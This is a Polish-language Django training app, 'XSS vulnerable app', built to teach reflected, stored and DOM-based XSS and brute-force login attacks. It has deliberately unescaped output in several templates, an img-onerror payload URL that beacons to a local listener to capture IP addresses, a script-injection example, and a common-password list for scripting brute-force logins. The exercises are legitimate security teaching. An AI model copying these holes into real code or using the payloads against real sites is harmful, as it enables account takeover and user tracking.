backend/project/app/urls.py
from django.urls import path
from . import views

app_name = "app"
urlpatterns = [
    path("", views.index, name="index"),
    path("logout", views.logout_view, name="logout"),
    path("tasks/", views.tasks, name="tasks"),
    path("tasks/reflected_xss/", views.reflected_xss, name="reflected_xss"),
    path("tasks/stored_xss", views.stored_xss, name="stored_xss"),
    path("tasks/dom_xss/", views.dom_xss, name="dom_xss"),
    path("tasks/stored_xss/add_comment", views.add_comment, name="add_comment"),
    path("tasks/stored_xss/delete_comment/<int:comment_id>/", views.delete_comment, name="delete_comment"),
    path("brute_force/", views.brute_force, name="brute_force"),
#    path('attack/', views.attack, name='attack'),  # Dodajemy ścieżkę /attack/
]

backend/project/project/urls.py
from django.contrib import admin
from django.urls import path, include

urlpatterns = [
    path('admin/', admin.site.urls),
    path('app/', include('app.urls')),
]

backend/project/app/models.py
from django.db import models
from django.contrib.auth.models import User

class Comments(models.Model):
    author = models.ForeignKey(User, on_delete=models.CASCADE)
    title = models.CharField(max_length=255, blank=True)
    content = models.TextField()
    date = models.DateTimeField(blank=True, null=True)

backend/project/app/forms.py
from django import forms
from django.contrib.auth.forms import AuthenticationForm
from .models import Comments
from django.contrib.auth.forms import UsernameField

class MyAuthenticationForm(AuthenticationForm):
    username = UsernameField(
        required=True, 
        widget=forms.TextInput(attrs={"class": "form-control", "id": "login-username", "name": "username"})
    )
    
    password = forms.CharField(
        required=True,
        strip=False,
        widget=forms.PasswordInput(attrs={"class": "form-control", "id": "login-password", "name": "password"})
    )


class CommmentForm(forms.ModelForm):
    
    class Meta:
        model = Comments
        fields = ["content"]
        widgets = {
            "content": forms.Textarea(attrs={"id": "commentText", "name": "commentText", "placeholder": "Write comment"}),
        }

backend/project/app/views.py
from django.shortcuts import render, redirect
from .forms import MyAuthenticationForm, CommmentForm
from .models import Comments
from django.contrib.auth import login, logout
from django.contrib.auth.decorators import login_required
from .classes import MyBaseUserCreationForm
from django.contrib.auth.models import User
from django.shortcuts import get_object_or_404
from django.http import Http404
import requests


def reflected_xss(request):
    """
    Widok obsługujący stronę /app/attack.
    Umożliwia wprowadzenie komunikatu i jego wyświetlenie.
    """
    message = None  # Domyślna wartość, gdy nic nie zostanie przesłane

    if request.method == "GET" and 'msg' in request.GET:
        message = request.GET['msg']  # Pobieramy komunikat z parametrów URL
    
    return render(request, 'app/reflected_xss.html', {'message': message})


def index(request):

    if request.user.is_authenticated:
        return redirect("app:tasks")

    if request.method == "POST": 
        
        if "signup" in request.POST:
            sign_up_form = MyBaseUserCreationForm(request.POST)
            sign_in_form = MyAuthenticationForm()
            
            if sign_up_form.is_valid():
                user = sign_up_form.save()
                login(request, user)
                return redirect("app:tasks")
        

        if "signin" in request.POST:
            sign_in_form = MyAuthenticationForm(request, data=request.POST)
            sign_up_form = MyBaseUserCreationForm()
            
            if sign_in_form.is_valid():
                user = sign_in_form.get_user()
                login(request, user)
                return redirect("app:tasks")
    
    else:
        sign_up_form = MyBaseUserCreationForm()
        sign_in_form = MyAuthenticationForm()

    context = {
        "sign_up_form": sign_up_form,
        "sign_in_form": sign_in_form
    }

    return render(request, "app/index.html", context)
    

@login_required
def tasks(request):
    username = request.user.username
    
    context = {"username": username}
    return render(request, "app/tasks.html", context)


def logout_view(request):
    logout(request)
    return redirect("app:index")


@login_required
def stored_xss(request):
    if request.method == "GET":
        comment_form = CommmentForm()
        comments = Comments.objects.select_related("author")

        context = {
            "comment_form": comment_form, 
            "comments": comments,
            "logged_user": request.user,
        }
        
        return render(request, "app/stored_xss.html", context)
    
    else:
        raise Http404("You can not access this page via GET.")


@login_required
def add_comment(request):
    if request.method == "POST":
        comment_form = CommmentForm(request.POST)
        if comment_form.is_valid():
            comment = comment_form.save(commit=False)
            comment.author = request.user
            comment.save()
            return redirect("app:stored_xss")
    else:
        return redirect("app:stored:xss")


@login_required
def delete_comment(request, comment_id):
    comment = get_object_or_404(Comments, id=comment_id)
    
    if request.method == "POST" and request.user.id == comment.author.id:
        comment.delete()
        return redirect("app:stored_xss")
    else:
        return redirect("app:stored_xss")


@login_required
def dom_xss(request):
    return render(request, "app/dom_xss.html")


@login_required
def brute_force(request):
    return render(request, "app/brute_force.html")

backend/project/app/templates/app/brute_force.html
{% load static  %}

<!DOCTYPE html>
<html lang="pl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Brute Force</title>
    <link rel="stylesheet" href="{% static 'app/stored.css' %}">
    <style>

.password-list a {
    margin: 0.2rem 0;
    text-decoration: none;
    color:#000000;
}

    </style>
</head>
<body>
    <h1>Brute Force Attack</h1>
    <div class="container">
        <div class="text-section">
            <h2>Instrukcja</h2>
            <p>
                Celem tego zadania jest stworzenie własnego skryptu w Pythonie, który symuluje atak brute-force na formularz logowania.
            </p>
            <p>
                Atak brute-force polega na próbowaniu wielu różnych kombinacji haseł, aby uzyskać dostęp do konta użytkownika. W tym zadaniu celem jest napisanie skryptu, który automatycznie przetestuje listę 100 najpopularniejszych haseł w celu zalogowania się do aplikacji.
            </p>
            <ul>
                <li>Nazwa użytkownika: <strong>"zgadnijmnie"</strong></li>
                <li>Zapytania przy logowaniu wysyłane zostają na adres: <code>http://127.0.0.1:8000/app/</code></li>
                <li>Przy poprawnej próbie logowania użytkownik zostaje przeniesiony na adres: <code>http://127.0.0.1:8000/app/tasks/</code></li>
                <li>Nie zapomnij o tokenie CSRF.</li>
            </ul>
            <div class="password-list">
                <p>
                    Lista top 100 haseł z
                    <a href="https://parade.com/living/most-common-passwords" target="_blank">https://parade.com/living/most-common-passwords</a>:
                </p>
            <pre style="overflow-x:visible">
                <code>
                    passwords = ['password', '123456', '123456789', 'guest', 'qwerty', '12345678', '111111', '12345', 'col123456', '123123', '1234567', '1234', '1234567890', '000000', '555555', '666666', '123321', '654321', '7777777', '123', 'D1lakiss', '777777', '110110jp', '1111', '987654321', '121212', 'Gizli', 'abc123', '112233', 'azerty', '159753', '1q2w3e4r', '54321', 'pass@123', '222222', 'qwertyuiop', 'qwerty123', 'qazwsx', 'vip', 'asdasd', '123qwe', '123654', 'iloveyou', 'a1b2c3', '999999', 'Groupd2013', '1q2w3e', 'usr', 'Liman1000', '1111111', '333333', '123123123', '9136668099', '11111111', '1qaz2wsx', 'password1', 'mar20lt', '987654321', 'gfhjkm', '159357', 'abcd1234', '131313', '789456', 'luzit2000', 'aaaaaa', 'zxcvbnm', 'asdfghjkl', '1234qwer', '88888888', 'dragon', '987654', '888888', 'qwe123', 'football', '3601', 'asdfgh', 'master', 'samsung', '12345678910', 'killer', '1237895', '1234561', '12344321', 'daniel', '000000', '444444', '101010', 'qazwsxedc', '789456123', 'super123', 'qwer1234', '123456789a', '823477aA', '147258369', 'unknown', '98765', 'q1w2e3r4', '232323', '102030', '12341234']
                </code>
            </pre>
        </div>

            <div class="hint-section">
                <button class="hint-button" data-hint="1">Pokaż podpowiedź 1</button>
                <button class="hint-button" data-hint="2">Pokaż podpowiedź 2</button>
                <button class="hint-button" data-hint="3">Pokaż podpowiedź 3</button>
            </div>
        </div>
    </div>

    <!--Modal-->
    <div id="modal-hint" class="modal hidden">
        <div class="modal-content">
            <span class="close-button">&times;</span>
            <h2>Podpowiedź</h2>
            <p id="modal-hint-text"></p>
        </div>
    </div>
    <a href="/app/tasks">Powrót do strony głównej</a>
    <script src="{% static 'app/script.js' %}"></script>
</body>
</html>

backend/project/app/templates/app/dom_xss.html
{% load static %}


<!DOCTYPE html>
<html lang="pl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>DOM based XSS</title>
    <link rel="stylesheet" href="{% static 'app/stored.css' %}">
</head>
<style>


</style>
<body>
    <h1>DOM based XSS</h1>
    <div class="container">
        <div class="text-section">
            <h2>Instrukcja</h2>

            <!-- Pierwsza część zadania -->
            <h3>Część 1: Wykrywanie podatności</h3>
            <p>
                Twoim celem jest przetestowanie podatności tej podstrony na atak <strong>DOM-based XSS</strong>.
            </p>
            <ul>
                <li>Serwer Django działa na porcie <code>8000</code>.</li>
                <li>Przygotuj serwer przechwytujący adresy IP na porcie <code>5000</code>, korzystając z Flaska.</li>
                <li>Jeśli nie masz Flaska, wykonaj następujące kroki:
                    <ol>
                        <li>Upewnij się, że masz zainstalowanego Pythona (sprawdź w terminalu, wpisując <code>python --version</code> lub <code>python3 --version</code>).</li>
                        <li>Zainstaluj Flask w terminalu:
                            <pre><code>pip install flask</code></pre>
                            </li>
                    </ol>
                <li>Skorzystaj z poniższego kodu w Pythonie (musisz natomiast uzupełnić funkcję, która pobiera adres IP), aby uruchomić serwer Flask:
                    <pre><code>
from flask import Flask, request

app = Flask(__name__)

@app.route('/track-image', methods=['GET'])
def track_image():
# Wpisz właściwą metodę, aby uzyskać adres IP klienta (dokumentacja Flask)
    print(f"Przechwycony adres IP: {...}")
    return '', 204

if __name__ == '__main__':
    app.run(host='127.0.0.1', port=5000, debug=True)
</code></pre>
                </li>
                <li>Uruchom powyższy kod, aby rozpocząć nasłuchiwanie. </li>
                <pre><code>python nazwa_pliku.py </code></pre>
                <li>
                    Skonstruuj złośliwy link, który wstrzyknie obraz z obsługą błędu do tej podstrony.
                    Poniżej znajduje się przykład linku, który należy wkleić w przeglądarce:
                    
                </li>
                <pre><code>
http://127.0.0.1:8000/app/tasks/dom_xss/?photo=&lt;img src=x onerror="const img=new Image();img.src='http://127.0.0.1:5000/track-image';document.body.appendChild(img);"&gt;
                </code></pre>
                <li>
                    Otwórz złośliwy link w przeglądarce, a Twój serwer Flask powinien zarejestrować adres IP w konsoli.
                </li>
            </ul>

            <!-- Druga część zadania -->
            <h3>Część 2: Naprawa podatności</h3>
            <ul>
                <li>Przeanalizuj, jak dane z parametru URL są wstawiane do elementu o identyfikatorze <code>user-photo</code> w pliku <code>dom_xss.html</code>.</li>
                <li>Upewnij się, że dane użytkownika są traktowane jako tekst, a nie jako kod HTML lub JavaScript, aby zapobiec ich wykonaniu w przeglądarce.</li>
            </ul>
            <p style="font-weight: bold;">
                Ważne: Zademonstruj zarówno przeprowadzenie ataku, jak i poprawioną wersję, która uniemożliwia wykonanie złośliwego kodu.
            </p>
        </div>
        <div class="dom_based-section">
            <h2>Zdjęcie</h2>
            <div id="user-photo" style="display: flex; flex-direction: column; align-items: center; gap: 10px;">
                <div>
                    <input type="file" id="file-input" accept="image/*">
                </div>
            </div>
            
        </div>
    </div>
    <a href="/app/tasks">Powrót do strony głównej</a>

    <script>
        const params = new URLSearchParams(window.location.search);
        const photoFromUrl = params.get("photo");

        if (photoFromUrl) {
            document.getElementById('user-photo').innerHTML = `${photoFromUrl}<button id='remove-photo-button'>Usuń zdjęcie</button>`;

            const baseUrl = window.location.origin + window.location.pathname;
            window.history.replaceState({}, document.title, baseUrl);

            document.getElementById('remove-photo-button').addEventListener('click', function() {
                document.getElementById('user-photo').innerHTML = '<input type="file" id="file-input" accept="image/*">';
                addFileInputListener();
            });
        }

        function addFileInputListener() {
            document.getElementById('file-input').addEventListener('change', function(event) {
                const file = event.target.files[0];
                if (file) {
                    const reader = new FileReader();
                    reader.onload = function(e) {
                        document.getElementById('user-photo').innerHTML = `<img src="${e.target.result}" alt="Zdjęcie użytkownika"><button id='remove-photo-button'>Usuń zdjęcie</button>`;
                        document.getElementById('remove-photo-button').addEventListener('click', function() {
                            document.getElementById('user-photo').innerHTML = '<input type="file" id="file-input" accept="image/*">';
                            addFileInputListener();
                        });
                    };
                    reader.readAsDataURL(file);
                }
            });
        }

        addFileInputListener();
    </script>
</body>
</html>

backend/project/app/templates/app/index.html
{% autoescape off%}
{% load static %}

<!DOCTYPE html>
<html lang="pl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>XSS vulnerable app</title>
    <link rel="stylesheet" href="{% static 'app/index.css' %}">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet">
</head>
<body>
    <header>
        <h1 class="text-center my-4">XSS vulnerable app</h1>
        <p class="text-center">Created by Tymoteusz Mróz, Michał Lekstan and Szymon Wątroba</p>
    </header>
    <div class="container d-flex justify-content-center gap-3">
        <!-- Formularz Rejestracji -->
        <div class="card p-4">
            <h3 class="text-center mb-4">Registration</h3>
            <form action="{% url 'app:index' %}" method="post">
                {% csrf_token %}
                <div>
                    <label for="{{ sign_up_form.username.id_for_label }}" class="form-label">Username</label>
                    {{ sign_up_form.username }}
                </div>
                <div>
                    <label for="{{ sign_up_form.email.id_for_label }}" class="form-label">E-mail</label>
                    {{ sign_up_form.email }}
                </div>
                <div>
                    <label for="{{ sign_up_form.password.id_for_label }}" class="form-label">Password</label>
                    {{ sign_up_form.password }}
                </div>
                <button type="submit" class="btn btn-success" name="signup">Sign up</button>
            </form>
        </div>
    
        <!-- Formularz Logowania -->
        <div class="card p-4">
            <h3 class="text-center mb-4">Login</h3>
            <form action="{% url 'app:index' %}" method="post">
                {% csrf_token %}
                <div class="mb-3">
                    <label for="{{ sign_in_form.username.id_for_label }}" class="form-label">Username</label>
                    {{ sign_in_form.username }}
                </div>
                <div class="mb-3">
                    <label for="{{ sign_in_form.password.id_for_label }}" class="form-label">Password</label>
                    {{ sign_in_form.password }}
                </div>
                <button type="submit" class="btn btn-primary" name="signin">Sign in</button>
            </form>
        </div>
    </div>

    <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.11.6/dist/umd/popper.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.min.js"></script>
</body>
</html>

{% endautoescape %}

backend/project/app/templates/app/reflected_xss.html
{% load static %}

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="{% static 'app/stored.css' %}">
    <title>Attack Simulation</title>
    
</head>
<style>
    form {
    display: flex;
    flex-direction: column;
    align-items: center;
    width: 100%;
    max-width: 400px;
    background-color: #fff;
    padding: 2rem;
    border-radius: 8px;
    box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
    border: 1px solid #e0e0e0;
}

form label {
    font-size: 1rem;
    color: #2c3e50;
    margin-bottom: 0.5rem;
    text-align: left;
    width: 90%;
}

form input[type="text"],
form button {
    width: 100%;
    padding: 10px 15px;
    margin-bottom: 1rem;
    border: 1px solid #ccc;
    border-radius: 5px;
    font-size: 1rem;
    box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
}

form input[type="text"] {
    background-color: #ecf0f1;
    transition: background-color 0.2s ease, box-shadow 0.2s ease;
}

form input[type="text"]:focus {
    outline: none;
    background-color: #fff;
    box-shadow: 0 0 0 2px rgba(52, 152, 219, 0.5);
}

form button {
    background-color: #3498db;
    color: white;
    border: none;
    cursor: pointer;
    transition: background-color 0.2s ease, transform 0.2s ease;
}

form button:hover {
    background-color: #2980b9;
    transform: scale(1.05);
}

form button:active {
    background-color: #1a74b8;
    transform: scale(0.95);
}

.result {
    margin-top: 1rem;
    padding: 1rem;
    border-radius: 8px;
    background-color: #ecf0f1;
    width: 90%;
    text-align: center;
    font-size: 1rem;
    color: #2c3e50;
    word-break: break-word;
}
</style>
<body>
    
    <h1>Reflected XSS</h1>

    <div class="container">
        <!-- Sekcja Instrukcji -->
        <div class="text-section">
            <h2>Instrukcja</h2>
                <p>
                    Twoim zadaniem jest przetestowanie podstrony pod kątem podatności na atak <strong>Reflected XSS</strong>.
                </p>
                <ul>
                    <li>Przeanalizuj, w jaki sposób parametry są przekazywane w adresie URL tej podstrony.</li>
                    <li>Sprawdź, jak dane wprowadzone w parametrze wpływają na wyświetlaną treść strony.</li>
                    <li>Oceń, czy można wprowadzić wartość, która zostanie zinterpretowana w sposób inny niż oczekiwano.</li>
                    <li>Wykorzystaj swoją wiedzę, aby zbadać, czy istnieje możliwość wykonania kodu <strong>JavaScript</strong>.</li>
                </ul>
        </div>

        <!-- Sekcja Formularza -->
        <div class="form-section">
            <h2>Testowanie XSS</h2>
            <form method="get" action="">
                <label for="msg">Wprowadź wiadomość:</label><br>
                <input type="text" id="msg" name="msg" placeholder="Wpisz swoją wiadomość tutaj">
                <button type="submit">Wyślij</button>
            </form>

            <!-- Wyświetlenie Wyniku -->
            {% if message %}
                <div class="result">
                    <h3>Twoja wiadomość:</h3>
                    <!-- UWAGA: Dane renderowane BEZ ucieczki -->
                    <div>{{ message|safe }}</div>
                </div>
            {% endif %}
        </div>
    </div>

    <a href="/app/tasks">Powrót do strony głównej</a>
</body>
</html>

backend/project/app/templates/app/stored_xss.html
{% load static  %}

<!DOCTYPE html>
<html lang="pl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Stored XSS</title>
    <link rel="stylesheet" href="{% static 'app/stored.css' %}">
</head>
<body>
    <h1>Stored XSS</h1>
    <div class="container">
        <div class="text-section">
            <h2>Instrukcja</h2>
            <p>
                Twoim celem jest przetestowanie podatności tej podstrony na atak <strong>Stored XSS</strong>.
            </p>
            <ul>
                <li>
                    Stwórz komentarz, którego przynajmniej część treści będzie stanowił skrypt JavaScript np. <code>&lt;script&gt;alert("atak cyborga")&lt;/script&gt;</code>..
                </li>
                <li>
                    Aby dodać komentarz, kliknij przycisk <strong>„Dodaj komentarz”</strong>. Wprowadź swoją treść w formularzu,
            a następnie kliknij <strong>„Dodaj”</strong>. Twój komentarz powinien pojawić się na liście.
                </li>
                <li>
                    Po utworzeniu komentarza trzeba się wylogować z konta użytkownika.
                    Wyloguj się z aktualnego konta użytkownika, klikając <strong>„Powrót do strony głównej”</strong>, a następnie <strong>„Wyloguj się”</strong>
                    w prawym górnym rogu.
                </li>
                <li>
                    Należy stworzyć nowe konto lub zalogować się na konto istniejącego już użytkownika (innego niż ten, z którego konta utworzyliśmy komentarz ze skryptem).
                    Następnie trzeba znowu wejść w sekcję <strong>Stored XSS</strong>. Skrypt powinien wykonać się również dla tego (nowo zalogowanego) użytkownika.
                </li>
                <p>
                    <strong>Jako potwierdzenie wykonania zadania należy przesłać zrzuty ekranu potwierdzające, że jeden (ten sam) skrypt wykonał się dla co najmniej dwóch różnych użytkowników. 
                    Można to zrobić uwzględniając w zrzucie ekranu również wartości ciasteczek: sessionid oraz username.</strong>
                </p>
            </ul>
        </div>
        <div class="comments-section">
            <h2>Komentarze</h2>
            <button class="add" onclick="openModal()">Dodaj komentarz</button>
            
            {% for comment in comments %}
                
                <div class="comment">
                    <div class="comment-header">
                        <div class="author">Autor: {{comment.author.username}}</div>
                        
                        {% if comment.author.id == logged_user.id %}
                        
                            <form action="{% url 'app:delete_comment' comment.id %}" method="post" style="display: inline-block;">
                                {% csrf_token %}
                                <button type="submit" class="delete-button">Usuń</button>
                            </form>
                        
                        {% endif %}
                    
                    </div>
                    {% autoescape off %}
                    <div class="text">{{ comment.content }}</div>
                    {% endautoescape %}
                </div>

            {% endfor %}
            
        </div>
    </div>
    <a href="{% url 'app:tasks' %}">Powrót do strony głównej</a>

    <!--Modal-->
    <div id="modal" class="modal" onclick="closeModalOnOutsideClick(event)">
        <div class="modal-content">
            <span class="close-button" onclick="closeModal()">&times;</span>
            <h2>Dodaj komentarz</h2>
            <form id="addCommentForm" action="{% url 'app:add_comment' %}" method="post">
                {% csrf_token %}
                {{ comment_form.content }}
                <button type="submit">Dodaj</button>
            </form>
        </div>
    </div>
    <script src="{% static 'app/script.js' %}"></script>
</body>
</html>

backend/project/app/templates/app/tasks.html
{% load static %}

<!DOCTYPE html>
<html lang="pl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>XSS vulnerable app</title>
    <link rel="stylesheet" href="{% static 'app/style.css' %}">
</head>
<style>

.navbar-right {
        display: flex;
        align-items: center;
        gap: 1rem;
    }

    .navbar-right span {
        font-size: 1rem;
        font-weight: bold;
    }

    .log-out-btn {
        background-color: #e74c3c;
        color: white;
        border: none;
        border-radius: 5px;
        padding: 10px 20px;
        font-size: 0.8rem;
    }

    .log-out-btn:hover {
    background-color: #c0392b;
    transform: scale(1.05);
    }

    .log-out-btn:active {
        transform: scale(0.95);
        background-color: #a93226;
    }

    .log-out-btn:focus {
        outline: none;
        box-shadow: 0 0 0 3px rgba(231, 76, 60, 0.5);
    }

</style>
<body>
    <nav class="navbar">
        <div class="navbar-left">
            <h1>XSS Playground</h1>
        </div>
        <div class="navbar-right">
            <span>{{ username }}</span>
            <form action="{% url 'app:logout' %}" method="post">
                {% csrf_token %}
                <button type="submit" class="log-out-btn">Wyloguj się</button>
            </form>
        </div>
    </nav>
    <header class="header-intro">
        <p>XSS vulnerable app</p>
    </header>
<div class="grid-container">
    <!-- Sekcja dla Reflected XSS -->
    <div class="section">
        <h2>Reflected XSS</h2>
        <p>Odbity atak XSS</p>
        <button onclick="location.href='{% url 'app:reflected_xss' %}'">Przejdź do zadania</button>
    </div>

    <!-- Sekcja dla Stored XSS -->
    <div class="section">
        <h2>Stored XSS</h2>
        <p>Trwały atak XSS</p>
        <form action="{% url 'app:stored_xss' %}" method="get">
            {% csrf_token %}
            <button type="submit">Przejdź do zadania</button>
        </form>
    </div>

    <!-- Sekcja dla DOM-based XSS -->
    <div class="section">
        <h2>DOM-based XSS</h2>
        <p>Atak XSS bazujący na DOM</p>
        <button onclick="location.href='{% url 'app:dom_xss' %}'">Przejdź do zadania</button>
    </div>

    <!-- Sekcja dla Brute Force Attack -->
    <div class="section brute-force">
        <h2>Brute Force Attack</h2>
        <p>Atak siłowy</p>
        <form action="{% url 'app:brute_force' %}" method="post">
            {% csrf_token %}
            <button type="submit">Przejdź do zadania</button>
        </form>
    </div>

</div>
</body>
</html>